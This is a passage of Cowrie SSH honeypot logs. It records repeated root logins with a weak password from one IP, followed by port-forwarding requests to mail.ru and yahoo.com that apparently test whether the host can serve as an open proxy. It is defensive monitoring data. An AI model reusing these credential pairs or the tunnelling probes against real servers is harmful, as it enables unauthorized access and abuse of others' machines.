ipemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:48:49.249338Z","src_ip":"77.83.207.83","session":"794546eddd9e"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:48:49.496924Z","src_ip":"77.83.207.83","session":"794546eddd9e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":14169,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:14169","sensor":"my-vps","timestamp":"2025-08-31T03:48:49.547539Z","session":"794546eddd9e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:49.597504Z","src_ip":"77.83.207.83","session":"794546eddd9e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"77.83.207.83","src_port":1350,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:1350","sensor":"my-vps","timestamp":"2025-08-31T03:48:49.740525Z","session":"794546eddd9e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:49.790125Z","src_ip":"77.83.207.83","session":"794546eddd9e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"77.83.207.83","src_port":30710,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:30710","sensor":"my-vps","timestamp":"2025-08-31T03:48:49.932049Z","session":"794546eddd9e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:49.981708Z","src_ip":"77.83.207.83","session":"794546eddd9e"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:48:50.032213Z","src_ip":"77.83.207.83","session":"794546eddd9e"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":5661,"dst_ip":"1.2.3.4","dst_port":22,"session":"a1767ee5535f","protocol":"ssh","message":"New connection: 77.83.207.83:5661 (1.2.3.4:22) [session: a1767ee5535f]","sensor":"my-vps","timestamp":"2025-08-31T03:48:50.081166Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:48:50.082092Z","src_ip":"77.83.207.83","session":"a1767ee5535f"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:48:50.131920Z","src_ip":"77.83.207.83","session":"a1767ee5535f"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:48:50.382057Z","src_ip":"77.83.207.83","session":"a1767ee5535f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":4383,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:4383","sensor":"my-vps","timestamp":"2025-08-31T03:48:50.432919Z","session":"a1767ee5535f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:50.483298Z","src_ip":"77.83.207.83","session":"a1767ee5535f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"77.83.207.83","src_port":16558,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:16558","sensor":"my-vps","timestamp":"2025-08-31T03:48:50.624676Z","session":"a1767ee5535f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:50.674937Z","src_ip":"77.83.207.83","session":"a1767ee5535f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"77.83.207.83","src_port":31525,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:31525","sensor":"my-vps","timestamp":"2025-08-31T03:48:50.816434Z","session":"a1767ee5535f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:50.866485Z","src_ip":"77.83.207.83","session":"a1767ee5535f"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:48:50.917601Z","src_ip":"77.83.207.83","session":"a1767ee5535f"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":5756,"dst_ip":"1.2.3.4","dst_port":22,"session":"aa559ffa75e6","protocol":"ssh","message":"New connection: 77.83.207.83:5756 (1.2.3.4:22) [session: aa559ffa75e6]","sensor":"my-vps","timestamp":"2025-08-31T03:48:50.966851Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:48:50.977244Z","src_ip":"77.83.207.83","session":"aa559ffa75e6"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:48:51.017581Z","src_ip":"77.83.207.83","session":"aa559ffa75e6"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:48:51.267437Z","src_ip":"77.83.207.83","session":"aa559ffa75e6"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":10230,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:10230","sensor":"my-vps","timestamp":"2025-08-31T03:48:51.318472Z","session":"aa559ffa75e6"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:51.368767Z","src_ip":"77.83.207.83","session":"aa559ffa75e6"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"77.83.207.83","src_port":20382,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:20382","sensor":"my-vps","timestamp":"2025-08-31T03:48:51.512352Z","session":"aa559ffa75e6"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:51.562426Z","src_ip":"77.83.207.83","session":"aa559ffa75e6"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"77.83.207.83","src_port":28545,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:28545","sensor":"my-vps","timestamp":"2025-08-31T03:48:51.704123Z","session":"aa559ffa75e6"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:51.754077Z","src_ip":"77.83.207.83","session":"aa559ffa75e6"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:48:51.804905Z","src_ip":"77.83.207.83","session":"aa559ffa75e6"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":5867,"dst_ip":"1.2.3.4","dst_port":22,"session":"c203240756b4","protocol":"ssh","message":"New connection: 77.83.207.83:5867 (1.2.3.4:22) [session: c203240756b4]","sensor":"my-vps","timestamp":"2025-08-31T03:48:51.855525Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:48:51.856449Z","src_ip":"77.83.207.83","session":"c203240756b4"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:48:51.908281Z","src_ip":"77.83.207.83","session":"c203240756b4"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:48:52.167496Z","src_ip":"77.83.207.83","session":"c203240756b4"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":18913,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:18913","sensor":"my-vps","timestamp":"2025-08-31T03:48:52.220373Z","session":"c203240756b4"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:52.272782Z","src_ip":"77.83.207.83","session":"c203240756b4"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"77.83.207.83","src_port":31340,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:31340","sensor":"my-vps","timestamp":"2025-08-31T03:48:52.418324Z","session":"c203240756b4"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:52.470730Z","src_ip":"77.83.207.83","session":"c203240756b4"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"77.83.207.83","src_port":7204,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:7204","sensor":"my-vps","timestamp":"2025-08-31T03:48:52.618420Z","session":"c203240756b4"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:52.670530Z","src_ip":"77.83.207.83","session":"c203240756b4"}
{"eventid":"cowrie.login.failed","username":"master","password":"12345","message":"login attempt [master/12345] failed","sensor":"my-vps","timestamp":"2025-08-31T03:48:52.697703Z","src_ip":"212.227.235.229","session":"a8da4328bd7b"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:48:52.723185Z","src_ip":"77.83.207.83","session":"c203240756b4"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":5953,"dst_ip":"1.2.3.4","dst_port":22,"session":"2d4741cccab0","protocol":"ssh","message":"New connection: 77.83.207.83:5953 (1.2.3.4:22) [session: 2d4741cccab0]","sensor":"my-vps","timestamp":"2025-08-31T03:48:52.772145Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:48:52.782121Z","src_ip":"77.83.207.83","session":"2d4741cccab0"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:48:52.822065Z","src_ip":"77.83.207.83","session":"2d4741cccab0"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:48:53.071024Z","src_ip":"77.83.207.83","session":"2d4741cccab0"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":29625,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:29625","sensor":"my-vps","timestamp":"2025-08-31T03:48:53.122038Z","session":"2d4741cccab0"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:53.172505Z","src_ip":"77.83.207.83","session":"2d4741cccab0"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"77.83.207.83","src_port":27023,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:27023","sensor":"my-vps","timestamp":"2025-08-31T03:48:53.312171Z","session":"2d4741cccab0"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:53.362210Z","src_ip":"77.83.207.83","session":"2d4741cccab0"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"77.83.207.83","src_port":14590,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:14590","sensor":"my-vps","timestamp":"2025-08-31T03:48:53.504213Z","session":"2d4741cccab0"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:53.554150Z","src_ip":"77.83.207.83","session":"2d4741cccab0"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:48:53.604909Z","src_ip":"77.83.207.83","session":"2d4741cccab0"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":6040,"dst_ip":"1.2.3.4","dst_port":22,"session":"df9ea3cbea79","protocol":"ssh","message":"New connection: 77.83.207.83:6040 (1.2.3.4:22) [session: df9ea3cbea79]","sensor":"my-vps","timestamp":"2025-08-31T03:48:53.654850Z"}
